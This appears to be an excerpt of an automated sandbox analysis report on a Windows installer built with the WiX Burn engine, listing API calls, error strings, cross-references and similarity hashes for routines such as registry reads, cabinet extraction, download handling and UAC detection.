• SetWindowLongW.USER32(?,000000EB,00000000), ref: 0042BB6C
• DefWindowProcW.USER32(?,?,?,?,?,00000000), ref: 0042BB9C
Similarity
• API ID: Window$LongProc$MessagePost$Quit
• String ID:
• API String ID: 3225497149-0
APIs
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
APIs
Strings
Similarity
• API ID: CloseHandleMutexRelease
• String ID: ElevatedOnExecuteActionComplete failed.$Failed to save state.$Unexpected elevated message sent to child process, msg: %u$d:\a\wix\wix\src\burn\engine\elevation.cpp
• API String ID: 4207627910-2686070462
APIs
• GetLastError.KERNEL32(?,?,?,00472327,00000000,00000000,00472AD6,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00000000), ref: 004725BC
Strings
• Failed to get HTTP status code for failed request to URL: %ls, xrefs: 004725F5
• Failed to get HTTP status code for request to URL: %ls, xrefs: 00472792
• Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 004725D3
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 004727A1
• Failed to get redirect url: %ls, xrefs: 0047277F
• Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00472755
Similarity
• API ID: ErrorLast
• String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
• API String ID: 1452528299-65429539
                                                                                                                                                          • Opcode ID: f030106e939e5b9fdf07d1c9f6d2fe6abf0eeac315f4b65bda27fa0f41c06e1d
                                                                                                                                                          • Instruction ID: 9c6db9820ea08f70ab912f616f3ee0211593f8050b097ac1174601344628568e
                                                                                                                                                          • Opcode Fuzzy Hash: f030106e939e5b9fdf07d1c9f6d2fe6abf0eeac315f4b65bda27fa0f41c06e1d
                                                                                                                                                          • Instruction Fuzzy Hash: 42515C79640115A7DB290E68CF49FF73A69EB11350F25C267FC08EB3A0D2EDCD009A99
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID: Failed to dequeue action.$Failed to start bootstrapper application.$Failed to wait on queue event.$d:\a\wix\wix\src\burn\engine\engine.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 2962429428-1970089462
                                                                                                                                                          • Opcode ID: 08ee04f5a28173d9e307fa9a0b393fecb16c680870471751fba835454586a358
                                                                                                                                                          • Instruction ID: e78bdd81256244f1faced098cdae675dd0c43d189fd5f413cf8f190ca3278cf9
                                                                                                                                                          • Opcode Fuzzy Hash: 08ee04f5a28173d9e307fa9a0b393fecb16c680870471751fba835454586a358
                                                                                                                                                          • Instruction Fuzzy Hash: DA519472900205ABEB10EF95CD46F9E77B4AB44714F24447FF948BB2C2EB789940CB69
                                                                                                                                                          APIs
                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00475DA2
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00475DAC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$ErrorFileLastSystem
                                                                                                                                                          • String ID: Failed to convert system time to file time.$Failed to copy time.$clbcatq.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\timeutil.cpp
                                                                                                                                                          • API String ID: 2781989572-1666417576
                                                                                                                                                          • Opcode ID: 82ff30d12897d098bcd6a084b5417339352cfe6c37de53699f77098eb093dc65
                                                                                                                                                          • Instruction ID: 9f771ce17d99a5a38c8cc58e2e16cc896985064f6127ca0013d9ac373b90e8bf
                                                                                                                                                          • Opcode Fuzzy Hash: 82ff30d12897d098bcd6a084b5417339352cfe6c37de53699f77098eb093dc65
                                                                                                                                                          • Instruction Fuzzy Hash: 8741E561A507057AE7309BB58C4ABFF6628EF91701F14C52FB509BE290D9ACCE018369
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(0040951C), ref: 0046B601
                                                                                                                                                            • Part of subcall function 0046ADB1: GetModuleHandleA.KERNEL32(kernel32.dll,0040951C,00000000,0040959C,?,0046B612,00000000,0040951C,00000000,?,?,00422D30,0040951C,?,0040951C,?), ref: 0046ADCF
                                                                                                                                                            • Part of subcall function 0046ADB1: GetLastError.KERNEL32(?,0046B612,00000000,0040951C,00000000,?,?,00422D30,0040951C,?,0040951C,?,0040951C,?,?,?), ref: 0046ADDB
                                                                                                                                                          Strings
                                                                                                                                                          • failed XmlCreateDocument, xrefs: 0046B624
                                                                                                                                                          • failed put_validateOnParse, xrefs: 0046B665
                                                                                                                                                          • failed put_resolveExternals, xrefs: 0046B6A1
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B633, 0046B674
                                                                                                                                                          • failed loadXML, xrefs: 0046B711
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed loadXML$failed put_resolveExternals$failed put_validateOnParse
                                                                                                                                                          • API String ID: 52713655-1521560163
                                                                                                                                                          • Opcode ID: dd527d37651f38d19374d01cb61ef82be83413fe3ebfc4970b5ffa72f9e3d7a7
                                                                                                                                                          • Instruction ID: c114c7170ab4305b47a74bdd37cce4ef73e0d2c36ddccc9cf699fce8dfe2e6fa
                                                                                                                                                          • Opcode Fuzzy Hash: dd527d37651f38d19374d01cb61ef82be83413fe3ebfc4970b5ffa72f9e3d7a7
                                                                                                                                                          • Instruction Fuzzy Hash: 7B419175A40218ABDB01DFA8CC45F9E77B9EF99710F11006AF905FB390EA749940CB9A
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?), ref: 0041C364
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep
                                                                                                                                                          • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$d:\a\wix\wix\src\burn\engine\cache.cpp$per-machine$per-user
                                                                                                                                                          • API String ID: 3472027048-2232460834
                                                                                                                                                          • Opcode ID: a4306cf5b63cabd9460afd90865a9243023176ef8523b7a0b30e936551671917
                                                                                                                                                          • Instruction ID: 46663f98a0f68daa438de3c7f801629374ac422da265a986d32ea24906f7d277
                                                                                                                                                          • Opcode Fuzzy Hash: a4306cf5b63cabd9460afd90865a9243023176ef8523b7a0b30e936551671917
                                                                                                                                                          • Instruction Fuzzy Hash: 4C412971AC0218B7EB216A95CC86FEF7668DB00F55F108027BE04F9291D67CCE9097AD
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040B517
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040B529
                                                                                                                                                          • Failed to get OS info., xrefs: 0040B3E5
                                                                                                                                                          • Failed to create VersionNT from QWORD., xrefs: 0040B4DA
                                                                                                                                                          • Failed to create VersionNT64 from QWORD., xrefs: 0040B49E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID: Failed to create VersionNT from QWORD.$Failed to create VersionNT64 from QWORD.$Failed to get OS info.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3664257935-876919890
                                                                                                                                                          • Opcode ID: cbd070244d7b9a14f93cd00cc3061431cd504c573364d65d6df6ba3d8a488d09
                                                                                                                                                          • Instruction ID: e36f754ff1fead06bbe7f28332f5ac6cae7c514da95c63816cadd684e98bd7bc
                                                                                                                                                          • Opcode Fuzzy Hash: cbd070244d7b9a14f93cd00cc3061431cd504c573364d65d6df6ba3d8a488d09
                                                                                                                                                          • Instruction Fuzzy Hash: 28418571E41239B6DB319B25CC46BEA76B8EB48704F1001E7F548B6281E778DF84CA9D
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: _memcpy_s
• String ID: Error reading wix version registry value due to unexpected data type: %u$Failed to convert registry string to wix version.$Failed to copy QWORD wix version value.$Failed to read wix version registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 2001391462-2685011744
• Opcode ID: e14ff5603b825adcf5587de066c0d77c1af8c42270fb23ef9cf0da2d6711ad4d
• Instruction ID: a02b9f1744c484a60712742329ac96512ae134e398bed0db75775d2749c6c2d5
• Opcode Fuzzy Hash: e14ff5603b825adcf5587de066c0d77c1af8c42270fb23ef9cf0da2d6711ad4d
• Instruction Fuzzy Hash: 7C41D771E80319BADB319A858C4EFAF7B78DF51B54F10415FF9007A280FA784E00C6AA
APIs
• _ValidateLocalCookies.LIBCMT ref: 00454177
• ___except_validate_context_record.LIBVCRUNTIME ref: 0045417F
• _ValidateLocalCookies.LIBCMT ref: 00454208
• __IsNonwritableInCurrentImage.LIBCMT ref: 00454233
• _ValidateLocalCookies.LIBCMT ref: 00454288
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 8bce646aca6b902b8a8e06c42f1c1a6471024598d6607a975997272646bd23e3
• Instruction ID: 8643f7d6eb143bfdde3ebae1ea1c9d147848d5b06b5817bd7b7b20f4e79cad61
• Opcode Fuzzy Hash: 8bce646aca6b902b8a8e06c42f1c1a6471024598d6607a975997272646bd23e3
• Instruction Fuzzy Hash: 21410734900218ABCF10DF69C884A9E7BB1AF8535DF14809AFC185F353D739DA99CB95
APIs
Strings
Similarity
• API ID: ErrorLast
• String ID: Failed to allocate memory for value.$Failed to allocate value.$Failed to get query information.$Failed to get size of value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\inetutil.cpp
• API String ID: 1452528299-1009889864
• Opcode ID: 1d6e6aaed8eecc63fac98ba6fdcc5547f643e7bc34b5198ffd5a34d148f99d1e
• Instruction ID: 8843eaca0c5c7d3c01b1e6bcb5fbd0a5fe56aeee13a788f38fd53ca076f7ad38
• Opcode Fuzzy Hash: 1d6e6aaed8eecc63fac98ba6fdcc5547f643e7bc34b5198ffd5a34d148f99d1e
• Instruction Fuzzy Hash: 5D314832E40624FBD7219E558C49FEF7B39EF04721F524137FA09BA2C1E2789E009698
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00418389,00000000,?,?,?), ref: 00468534
• RegEnumValueW.ADVAPI32(?,?,00418389,00000000,?,?,?), ref: 004685B9
Strings
Similarity
• API ID: EnumInfoQueryValue
• String ID: Failed to allocate array for registry value name$Failed to enumerate registry value$Failed to get max size of value name under registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 918324718-781229554
• Opcode ID: 41471647dced34feb768b422c6bd16d79a4c91c5bfd38ab4e1597f77e3a78a69
• Instruction ID: 447334ac04d9c9018c6eab6a3e85cb572b2267db757db1085b0edb3a9ac6cea6
• Opcode Fuzzy Hash: 41471647dced34feb768b422c6bd16d79a4c91c5bfd38ab4e1597f77e3a78a69
• Instruction Fuzzy Hash: 58213776604219BFEB114A098D44EAB376DDB807A4F21013FBD05BB390FA7C8D0196BE
APIs
• CompareStringW.KERNEL32(0000007F,00000000,004221A7,000000FF,00D47D83,000000FF,00000000,PackageVersion,004221A7,500B74C0,?,00000001,00000000,004221A7,?,004221A7), ref: 00416C6B
• RegCloseKey.ADVAPI32(00000000,00000000,PackageVersion,004221A7,500B74C0,?,00000001,00000000,004221A7,?,004221A7,00000000,?,?,?,004221A7), ref: 00416C88
Strings
• Failed to format key for update registration., xrefs: 00416C0F
• Failed to remove update registration key: %ls, xrefs: 00416CBD
• d:\a\wix\wix\src\burn\engine\registration.cpp, xrefs: 00416C21, 00416CCF
• PackageVersion, xrefs: 00416C4C
Similarity
• API ID: CloseCompareString
• String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion$d:\a\wix\wix\src\burn\engine\registration.cpp
• API String ID: 446873843-1552062835
• Opcode ID: 4e2f349253f13d80a3c0ca46be93cd4c4c71c30380a5a5432032e77d4090e6ca
• Instruction ID: a07fd4fad8dc904094a4160f50fa6cdd7f88f81db1c87e14812a48324d9cc182
• Opcode Fuzzy Hash: 4e2f349253f13d80a3c0ca46be93cd4c4c71c30380a5a5432032e77d4090e6ca
• Instruction Fuzzy Hash: 08310931D40224BBDB21ABA9CD06FDFBE78DF00754F11026BB954B6191F67C8A81C6D8
APIs
Strings
Similarity
• API ID: _memcpy_s
• String ID: Error reading version registry value due to unexpected data type: %u$Failed to convert registry string to version.$Failed to copy QWORD version value.$Failed to read version registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 2001391462-1875010524
• Opcode ID: bcd5991336eb22e5a31ec228a225e69b438fadc2c126e0c72ac8c41272e4e561
• Instruction ID: f753ef0490fdc1cf21c2ce11b5575267757f4104593fa0deddb2e0144d009a50
• Opcode Fuzzy Hash: bcd5991336eb22e5a31ec228a225e69b438fadc2c126e0c72ac8c41272e4e561
• Instruction Fuzzy Hash: D521F431A80714B7DB3056458C4EF9F7B289B52B64F1001AFFA007A2C1F9794940C69A
APIs
Strings
Similarity
• API ID: CloseErrorExecuteHandleLastShell
• String ID: PDGu$ShellExecEx failed with return code: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
• API String ID: 3023784893-2236508546
• Opcode ID: 07644c966cc1f92338ddaaca5053e6d129bd7d4530e2e7d216928021cb60d487
• Instruction ID: 2cd075708efec31ea9baf64a34c1020b1a73156107f3c420ec179f7094fffcde
• Opcode Fuzzy Hash: 07644c966cc1f92338ddaaca5053e6d129bd7d4530e2e7d216928021cb60d487
• Instruction Fuzzy Hash: 28313AB5E00219ABDB10DF5ACC45A9EBBF8AF98754F14402BFD05F7350E77899008BA9
APIs
• IsWindow.USER32(?), ref: 0044ED2F
  • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
  • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcessWindow
                                                                                                                                                          • String ID: BA passed NULL hwndParent to Apply.$BA passed invalid hwndParent to Apply.$Failed to alloc BAENGINE_ACTION$Failed to enqueue apply action.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
                                                                                                                                                          • API String ID: 2772125699-1527517701
                                                                                                                                                          • Opcode ID: 4e656d76197757d7e97402f0cbc66b9a5773a5e590136485e17914798e10a8ae
                                                                                                                                                          • Instruction ID: da726627c15c848a104714498f2997eec8c8eff0ac0e18e37f99bcbc5c9e70dd
                                                                                                                                                          • Opcode Fuzzy Hash: 4e656d76197757d7e97402f0cbc66b9a5773a5e590136485e17914798e10a8ae
                                                                                                                                                          • Instruction Fuzzy Hash: 392107B1F80315B7F62155068C4BFAB2A5CAB00F68F21407BB904BE2D1E6FD5D0042AD
                                                                                                                                                          APIs
                                                                                                                                                          • InitializeAcl.ADVAPI32(00000000,00000008,00000002,0000001A,00000000,00000000,00000000,000000B0), ref: 0041C4C8
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C4D2
                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000001,20000004,00000000,00000000,00000000,00000000,00000003,000007D0,00000000,00000000,000000B0), ref: 0041C53E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                          • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 669721577-465332322
                                                                                                                                                          • Opcode ID: 34b7461a4d530753b4bf5e92ccaa87a78ca1522b4eda8fdedb3831200cd0ce1c
                                                                                                                                                          • Instruction ID: cccf3788ec9b8586252bc9805f9a57de2c71f808e50afeb1abc925b2017da11e
                                                                                                                                                          • Opcode Fuzzy Hash: 34b7461a4d530753b4bf5e92ccaa87a78ca1522b4eda8fdedb3831200cd0ce1c
                                                                                                                                                          • Instruction Fuzzy Hash: 1221FB72E8422477E7216A998C86FEFB66DAB40B54F11412BB904F72C1E6BCAD404798
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                          • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 1970631241-2055879782
                                                                                                                                                          • Opcode ID: 0beaebafe2ee6d04d1baa1715cca62c73455fd08a0970b90525722e9edd07730
                                                                                                                                                          • Instruction ID: 0c89f0c3f72117500d099aca204455961e6fe4908b82beba8c84e9566b86ad4c
                                                                                                                                                          • Opcode Fuzzy Hash: 0beaebafe2ee6d04d1baa1715cca62c73455fd08a0970b90525722e9edd07730
                                                                                                                                                          • Instruction Fuzzy Hash: 5A21F776640201BBCB11DF19DC45E5B7B68EF88724F1140AAFE04AB292D2B5DD408758
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,00466476,?), ref: 004665A3
                                                                                                                                                          Strings
                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 004664ED
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\osutil.cpp, xrefs: 00466536
                                                                                                                                                          • Failed to read registry value to detect UAC., xrefs: 0046657B
                                                                                                                                                          • Failed to open system policy key to detect UAC., xrefs: 00466527
                                                                                                                                                          • EnableLUA, xrefs: 0046654D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: EnableLUA$Failed to open system policy key to detect UAC.$Failed to read registry value to detect UAC.$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\osutil.cpp
                                                                                                                                                          • API String ID: 3535843008-2939735829
